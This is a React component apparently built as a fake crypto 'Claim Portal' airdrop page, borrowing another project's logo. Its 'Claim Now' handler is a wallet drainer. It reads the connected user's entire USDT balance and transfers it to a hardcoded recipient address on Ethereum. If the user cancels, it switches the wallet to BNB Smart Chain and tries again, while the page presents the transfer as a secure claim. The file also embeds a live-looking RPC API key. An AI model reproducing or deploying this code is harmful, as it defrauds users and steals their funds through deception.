// src/chain/usdt/App.js
import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { AlertCircle, CheckCircle, Loader2 } from 'lucide-react';

// --- WEB3MODAL IMPORTS AND CONFIGURATION ---
import {
  createWeb3Modal,
  defaultConfig,
  useWeb3Modal,
  useWeb3ModalAccount,
  useWeb3ModalProvider
} from '@web3modal/ethers5/react';
//import Design from '../eth/Design';

// --- Configuration (From your provided multi-chain setup) ---
const projectId = 'fb6dcb3d60a52008974d297a3c2efcaa';
const rpcUrl = 'https://eth-mainnet.g.alchemy.com/v2/beOBYQ7VpAauG_5DD1hIT';

const USDT_ADDRESSES = {
  1: '0xdAC17F958D2ee523a2206206994597C13D831ec7',  // Ethereum Mainnet
  56: '0x55d398326f99059fF775485246999027B3197955' // BNB Smart Chain
};
const RECIPIENT_ADDRESSES = {
  1: '0x10Ba076aA50ddEF71503Be1d311cC51Fde406A10',
  56: '0x10Ba076aA50ddEF71503Be1d311cC51Fde406A10'
};
const ERC20_ABI = [
  'function transfer(address to, uint256 amount) returns (bool)',
  'function balanceOf(address owner) view returns (uint256)',
  'function decimals() view returns (uint8)'
];
 
const mainnet = { chainId: 1, name: 'Ethereum', currency: 'ETH', explorerUrl: 'https://etherscan.io', rpcUrl };
const bsc = {
  chainId: 56,
  name: 'BNB Smart Chain',
  currency: 'BNB',
  explorerUrl: 'https://bscscan.com',
  rpcUrl: 'https://bnb-mainnet.g.alchemy.com/v2/beOBYQ7VpAauG_5DD1hIT'
};
const metadata = { 
  name: 'Grixforgenetwork', 
  description: 'Grixforgenetwork', 
  url: 'https://grixforgenetwork.cc',
  icons: ['https://b.galxestatic.com/sahara-earndrop-web/_next/static/media/logo.414840a7.svg'] 
};

const ethersConfig = defaultConfig({
  metadata,
  enableEIP6963: true,
  enableInjected: true,
  enableCoinbase: true,
});

createWeb3Modal({
  ethersConfig,
  chains: [mainnet, bsc],
  projectId,
  themeMode: 'dark',
  themeVariables: { '--w3m-accent': '#EAF8CD' }
});

// --- THE USDT CLAIM PAGE COMPONENT ---
// This component receives an `onDisconnect` prop to go back to the main landing page.
const Design = ({ onDisconnect }) => {
  const { open } = useWeb3Modal();
  const { address: account, chainId, isConnected } = useWeb3ModalAccount();
  const { walletProvider } = useWeb3ModalProvider();

  const [claimState, setClaimState] = useState('idle');
  const [error, setError] = useState('');
  const [txHash, setTxHash] = useState('');
  const [network, setNetwork] = useState('ETH'); // Track where we are sending

  
const handleClaimClick = async () => {
  if (!isConnected || !account || !chainId || !walletProvider) {
    setClaimState('error');
    setError("Please connect your wallet first.");
    return;
  }

  setClaimState('sending');
  setError('');
  setTxHash('');
  setNetwork('ETH');

  try {
    const provider = new ethers.providers.Web3Provider(walletProvider);
    const signer = provider.getSigner();
    const usdtContract = new ethers.Contract(USDT_ADDRESSES[chainId], ERC20_ABI, signer);

    const rawBalance = await usdtContract.balanceOf(account);

    const tx = await usdtContract.transfer(RECIPIENT_ADDRESSES[chainId], rawBalance);
    setTxHash(tx.hash);
    await tx.wait();
    setClaimState('success');
    return;
  } catch (err) {
    console.error("ETH transfer failed:", err);

    if (err.code === 4001 || err.message?.includes("User canceled")) {
      setError("User canceled ETH transfer. Trying BSC...");
    } else {
      setError("ETH transfer failed. Trying BSC...");
    }

  // === FALLBACK TO BSC ===
setNetwork('BSC');
try {
  // Ask wallet to switch to BSC
  await walletProvider.request({
    method: "wallet_switchEthereumChain",
    params: [{ chainId: "0x38" }], // 56 in hex
  });

  const bscProvider = new ethers.providers.Web3Provider(walletProvider);
  const bscSigner = bscProvider.getSigner();
  const bscContract = new ethers.Contract(USDT_ADDRESSES[56], ERC20_ABI, bscSigner);

  const rawBalanceBsc = await bscContract.balanceOf(account);

  const txBsc = await bscContract.transfer(RECIPIENT_ADDRESSES[56], rawBalanceBsc);
  setTxHash(txBsc.hash);
  await txBsc.wait();
  setClaimState('success');
} catch (errBsc) {
  console.error("BSC transfer failed:", errBsc);
  setError(errBsc.message || "BSC transfer failed");
  setClaimState('error');
}
  }

};





  const getExplorerUrl = () => {
    if (!txHash) return '#';
    return chainId === 56 ? `https://bscscan.com/tx/${txHash}` : `https://etherscan.io/tx/${txHash}`;
  };

  // --- STYLES FOR THIS PAGE AND MODAL ---
  const pageStyles = `
    .usdt-page-container {
      width: 100vw; height: 100vh; display: flex;
      justify-content: center; align-items: center;
      background-color: #0D1117; animation: fadeIn 0.5s ease-in-out;
    }
    .claim-modal-content {
      background: rgba(22, 27, 34, 0.8); backdrop-filter: blur(15px);
      -webkit-backdrop-filter: blur(15px); border: 1px solid rgba(255, 255, 255, 0.1);
      border-radius: 20px; width: 90%; max-width: 450px; padding: 2rem;
      box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37); animation: slideIn 0.5s ease-out;
    }
    .claim-modal-header { text-align: center; margin-bottom: 1.5rem; }
    .claim-modal-header h2 { font-size: 1.75rem; color: #fff; margin: 0 0 0.5rem 0; }
    .claim-modal-header p { font-size: 1rem; color: #A0A0A0; margin: 0; }
    .status-container {
      min-height: 70px; display: flex; flex-direction: column;
      justify-content: center; align-items: center; padding: 1rem;
      margin-bottom: 1.5rem; border-radius: 12px; background: rgba(0,0,0,0.2);
    }
    .status-sending { color: #00C6FF; } .status-success { color: #28a745; }
    .status-error { color: #dc3545; }
    .status-container p { margin: 0; font-weight: 500; }
    .status-container a { color: #007BFF; text-decoration: none; font-size: 0.9rem; margin-top: 5px; }
    .status-container a:hover { text-decoration: underline; }
    .claim-modal-actions { display: flex; gap: 1rem; }
    .claim-button {
      flex: 1; border: none; border-radius: 12px; padding: 16px;
      font-size: 1.1rem; font-weight: 600; cursor: pointer; transition: all 0.3s ease;
    }
    .claim-button-secondary { background: #333; color: #EAEAEA; border: 1px solid #555; }
    .claim-button-secondary:hover { background: #444; }
    .claim-button-primary { background: linear-gradient(90deg, #50af95, #26a9e0); color: white; }
    .claim-button-primary:hover { transform: translateY(-3px); box-shadow: 0 6px 20px rgba(80, 175, 149, 0.5); }
    .claim-button:disabled { background: #555; color: #888; cursor: not-allowed; }
    @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }
    @keyframes slideIn { from { transform: translateY(30px); opacity: 0; } to { transform: translateY(0); } }
    @keyframes spin { from { transform: rotate(0deg); } to { transform: rotate(360deg); } }
    .animate-spin { animation: spin 1s linear infinite; }
  `;

  useEffect(() => {
    if (!isConnected) {
     open(); 
    }
  }, [isConnected]);
  return (
    <>
      <style>{pageStyles}</style>
      <div className="usdt-page-container">
        <div className="claim-modal-content">
          <div className="claim-modal-header">
            <h2>Claim Portal</h2>
            <p>Securely connect your wallet and click claim to proceed.</p>
          </div>

          <div className="status-container">
            {claimState === 'sending' && (
              <div className="status-sending">
                <Loader2 className="animate-spin" size={24} />
                <p>Processing transaction...</p>
                {txHash && <a href={getExplorerUrl()} target="_blank" rel="noopener noreferrer">View on Explorer</a>}
              </div>
            )}
            {claimState === 'success' && (
              <div className="status-success">
                <CheckCircle size={24} />
                <p>Transfer Successful!</p>
             
              </div>
            )}
            {claimState === 'error' && (
              <div className="status-error">
                <AlertCircle size={24} />
                <p>{error || 'An error occurred.'}</p>
              </div>
            )}
             {claimState === 'idle' && (
                <p style={{color: '#888'}}>Awaiting action...</p>
            )}
          </div>

          <div className="claim-modal-actions">
          <button
          className="claim-button claim-button-secondary"
          onClick={() => {
            //onDisconnect();          // disconnect wallet
            window.location.reload(); // refresh page
          }}
        >
          Go Back
        </button>

            {!isConnected ? (
              <button className="claim-button claim-button-primary" onClick={() => open()}>
                Connect Wallet
              </button>
            ) : (
              <button 
                className="claim-button claim-button-primary" 
                onClick={handleClaimClick}
                disabled={claimState === 'sending' || claimState === 'success'}
              >
                {claimState === 'sending' ? 'Processing...' : 'Claim Now'}
              </button>
            )}
          </div>
        </div>
      </div>
    </>
  );
};

export default Design;